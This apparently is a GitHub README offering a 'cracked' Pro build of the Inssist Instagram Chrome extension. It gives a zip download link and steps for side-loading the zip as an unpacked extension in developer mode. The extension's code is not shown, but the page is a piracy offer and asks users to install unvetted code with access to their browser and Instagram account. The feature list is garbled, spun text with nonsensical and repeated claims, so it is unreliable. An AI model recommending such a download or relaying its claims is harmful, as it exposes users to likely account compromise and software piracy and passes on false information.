# Inssist Extension Cracked
Inssist (Instagram Assistant) is a free Chrome extension that lets you upload Instagram, upload photos and videos, organize and pre-organize posts, post articles, view followers, send DMs, and more. Not only can you download Instagram videos from your computer, but you can also play videos from IGTV, News and Reel. In our experience, these images worked well. It’s currently the only Chrome add-on that supports video recording on computers. The steps for this are similar to the Instagram app on your smartphone. The content expression has two dimensions.

## Download [Inssist Extension Cracked](https://github.com/SL911-x/Inssist-Extension-Cracked/raw/main/INSSIST%20Pro%20Cracked.zip)
[Download](https://github.com/SL911-x/Inssist-Extension-Cracked/raw/main/INSSIST%20Pro%20Cracked.zip)

# How To Install Insist Pro Crack?
1. Extract The Zip File
2. Go to chrome://extensions/ and check the box for Developer mode in the top right.
3. Go back to the chrome://extensions/ page and click the Load unpacked extension button and select the unzipped folder then install both extensions.

# Inssist Pro Latest Features:
- Inssist Pro Crack is the only Chrome extension that supports video streaming, and the only way to download videos from your tablet without sharing your Instagram account with a third-party app.
- In addition, Insist ensures that the image produced has the best and optimal resolution. Images added to
- Boost is not contaminated when displaying images compared to other Chrome enhancements or “transition” modes.
- Inssist Pro also lets you create a carousel without a mobile phone and is the only way to create a carousel app.
- It’s the only Chrome extension that supports video streaming, and the only way to import videos from your tablet without sharing your Instagram keywords with third-party apps.
- It also supports articles and tags.
- It is important to make sure that the photos are taken with the correct selection. Landscape images and images generated by IGSWISS are not contaminated with images  embedded in other Chrome extensions.
